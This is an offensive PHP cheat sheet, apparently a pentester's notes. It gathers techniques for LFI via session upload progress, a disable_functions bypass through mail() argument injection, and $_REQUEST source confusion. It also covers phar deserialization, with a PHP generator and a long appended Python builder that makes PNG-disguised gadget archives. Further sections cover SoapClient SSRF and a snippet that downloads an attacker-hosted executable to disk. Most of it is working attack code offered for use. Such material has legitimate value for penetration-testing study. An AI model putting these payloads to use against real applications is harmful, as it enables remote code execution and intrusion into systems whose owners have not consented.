Dangerous Functions

PHP Temporary Files

PHP writes temporary files for uploads sent with POST (in upload_tmp_dir) and for sessions (sess_<id> in session.save_path, which is /tmp on most installs). With an LFI we can get PHP code into one of these files and then include it.

PHP_SESSION_UPLOAD_PROGRESS (will create sess_xct in /tmp): if session.upload_progress.enabled is on, which is the default, and a multipart POST carries a field with this name ahead of the file field, PHP stores the field's value unsanitized in the session file under the key upload_progress_<value>. We pick the session ID ourselves through the PHPSESSID cookie, so the path is known. Because session.upload_progress.cleanup is also on by default, the entry is removed as soon as the upload completes, so the include has to race the upload (send a large dummy file and loop). In the curl command below, <payload is curl's "read the value from a file" syntax: the PHP code comes from a local file named payload.

curl --path-as-is '' -F 'PHP_SESSION_UPLOAD_PROGRESS=<payload' -F 'data=@dummy.txt' -H 'Cookie: PHPSESSID=xct';

Disable Functions Bypass


The fifth argument of mail() is appended to the command line of the binary configured as sendmail_path. PHP runs it through escapeshellcmd()-style filtering, so shell metacharacters are escaped but paired quotes survive; what you get is argument injection into the MTA binary rather than a shell, and which option is useful depends on what sits behind sendmail_path. For example:

    <?php
    // the fifth argument is handed to the sendmail binary as extra arguments
    mail("a", "b", "c", "d", "-H 'bash /tmp/exploit'");

PHP7 Backtrace

Interesting Behavior

$_REQUEST merges values from GET, POST and COOKIE. Which sources are included, and which one wins when the same name appears in several, is controlled by request_order (falling back to variables_order); later letters override earlier ones, so with the built-in default EGPCS a cookie would override a POST value of the same name. The php.ini shipped with PHP sets request_order = "GP", which is why cookies are left out of $_REQUEST by default in practice. Where an ini includes C, sending different values in GET, POST and COOKIE makes code that reads $_REQUEST and code that reads $_GET or $_POST disagree, which can be used to slip past checks done on only one of them.


If uploaded content reaches file_exists(), is_file(), filesize(), file_get_contents() or any other filesystem function with an attacker-controlled path, we can point that path at the upload through the phar:// wrapper. Opening a phar unserializes the metadata stored in its manifest, so deserialization gadgets become reachable without unserialize() ever being called on our input. The upload only has to contain a valid phar after an arbitrary prefix (the extension does not matter), which is why the generator below fakes a PNG header. Caveat: PHP 8.0 stopped unserializing phar metadata automatically on open (it is only parsed when Phar::getMetadata() is called), so this trigger works on PHP 7 and earlier.

<?php
// run with phar.readonly=0, e.g.: php -d phar.readonly=0 gen.php
function generate_base_phar($o, $prefix){
    global $tempname;
    if (file_exists($tempname)) unlink($tempname);   // start from a clean archive
    $phar = new Phar($tempname);                     // filename must end in .phar to be created
    $phar->startBuffering();
    $phar->addFromString("test.txt", "$prefix xct_was_here");
    $phar->setStub("$prefix<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($o);                          // the gadget object, unserialized when the phar is opened
    $phar->stopBuffering();
    $basecontent = file_get_contents($tempname);
    return $basecontent;
}

$object = new <Your Class>;   // placeholder: instantiate your gadget class here

# prefix for faking a valid png
$prefix = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x05\x0a\x00\x00\x01\x56";
$tempname = 'temp.phar'; // make it phar
$outfile = 'out.png';
file_put_contents($outfile, generate_base_phar($object, $prefix));
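As an added example that is not from the page, the same archive built by hand in Python: no PHP and no phar.readonly=0 needed, and the manifest layout that the phar:// reader parses is written out explicitly. The gadget class name and property are placeholders to swap for a real chain from the target; parse_header() on the result shows exactly what PHP will see before you upload it.

```python
#!/usr/bin/env python3
"""Build a PNG-prefixed phar by hand, with a serialized object as metadata.

Added example, not code from the page. The gadget class name and property
are placeholders (assumption); only public properties are emitted.
"""
import hashlib
import struct
import zlib

# Same fake PNG header the page uses: signature plus the start of an IHDR chunk.
PNG_PREFIX = (b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR"
              b"\x00\x00\x05\x0a\x00\x00\x01\x56")
HALT = b"<?php __HALT_COMPILER(); ?>\r\n"  # the phar reader starts parsing after this
PHAR_HDR_SIGNATURE = 0x10000              # global flag: archive is signed
PHAR_SIG_SHA1 = 2                         # signature type; satisfies phar.require_hash


class PhpObject:
    """A PHP object to serialize: class name plus public properties."""
    def __init__(self, cls, props):
        self.cls, self.props = cls, props


def php_serialize(v):
    """Minimal serialize() covering the types a gadget payload needs."""
    if v is None:
        return b"N;"
    if isinstance(v, bool):
        return b"b:%d;" % v
    if isinstance(v, int):
        return b"i:%d;" % v
    if isinstance(v, str):
        v = v.encode()
    if isinstance(v, bytes):
        return b's:%d:"%s";' % (len(v), v)
    if isinstance(v, dict):
        body = b"".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return b"a:%d:{%s}" % (len(v), body)
    if isinstance(v, PhpObject):
        body = b"".join(php_serialize(k) + php_serialize(x) for k, x in v.props.items())
        return b'O:%d:"%s":%d:{%s}' % (len(v.cls), v.cls.encode(), len(v.props), body)
    raise TypeError("unsupported type %r" % type(v))


def build_phar(prefix, files, metadata, alias=b""):
    """Return prefix + stub + manifest + file data + SHA1 signature.

    Manifest layout (integers are uint32 little-endian): entry count, 2-byte API
    version, global flags, alias length, alias, metadata length, metadata, then
    one entry per file; the file contents follow the manifest in the same order.
    """
    meta = php_serialize(metadata) if metadata is not None else b""
    entries, contents = b"", b""
    for name, data in files.items():
        n = name.encode()
        # name len, name, uncompressed size, mtime, compressed size, crc32, perms, metadata len
        entries += struct.pack("<I", len(n)) + n
        entries += struct.pack("<IIIIII", len(data), 0, len(data), zlib.crc32(data), 0o666, 0)
        contents += data
    manifest = (struct.pack("<I", len(files)) + b"\x11\x10"
                + struct.pack("<I", PHAR_HDR_SIGNATURE)
                + struct.pack("<I", len(alias)) + alias
                + struct.pack("<I", len(meta)) + meta + entries)
    body = prefix + HALT + struct.pack("<I", len(manifest)) + manifest + contents
    # The SHA1 covers everything before it; signature type + "GBMB" close the file.
    return body + hashlib.sha1(body).digest() + struct.pack("<I", PHAR_SIG_SHA1) + b"GBMB"


def verify_phar_signature(phar):
    """Check the trailing SHA1 the way PHP does before it parses the manifest."""
    if phar[-4:] != b"GBMB" or struct.unpack("<I", phar[-8:-4])[0] != PHAR_SIG_SHA1:
        return False
    return hashlib.sha1(phar[:-28]).digest() == phar[-28:-8]


def parse_header(phar):
    """Walk the manifest like the phar reader does, to see what PHP will see."""
    pos = phar.index(HALT) + len(HALT)
    (mlen,) = struct.unpack_from("<I", phar, pos)
    count, flags, alias_len = struct.unpack_from("<I2xII", phar, pos + 4)
    pos += 18 + alias_len
    (meta_len,) = struct.unpack_from("<I", phar, pos)
    meta = phar[pos + 4:pos + 4 + meta_len]
    pos += 4 + meta_len
    names = []
    for _ in range(count):
        (nlen,) = struct.unpack_from("<I", phar, pos)
        names.append(phar[pos + 4:pos + 4 + nlen].decode())
        (entry_meta_len,) = struct.unpack_from("<I", phar, pos + 4 + nlen + 20)
        pos += 4 + nlen + 24 + entry_meta_len
    return {"manifest_len": mlen, "flags": flags, "metadata": meta,
            "files": names, "data_offset": pos}


if __name__ == "__main__":
    gadget = PhpObject("SomeGadgetClass", {"cmd": "id"})  # placeholder class
    phar = build_phar(PNG_PREFIX, {"test.txt": b"xct_was_here"}, gadget)
    with open("out.png", "wb") as f:
        f.write(phar)
    print(parse_header(phar))
```

The stub ends in "?>\r\n" on purpose: the reader swallows an optional newline after the closing tag, so without it a manifest length whose first byte happens to be 0x0a or 0x0d would be eaten. The signature is mandatory because phar.require_hash defaults to on; verify_phar_signature() mirrors that check, so run it on anything you hand-edit.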

If no good gadgets are available in the application's own classes, the built-in SoapClient can be used to SSRF via gopher to other local services like MySQL: after unserialization its location and user_agent properties are attacker-controlled. Note that SoapClient only sends its request when a method is called on the object (__call), so the chain still needs something that invokes a method on it.

Eval Code Injection

Simple but effective:


Upload & Execute File

    <?php
    // fetch the binary from the attacker host (URL elided on the page) and drop it to disk
    $data = file_get_contents("");
    file_put_contents("C:\\programdata\\xc_10.10.14.51_8080.exe", $data);
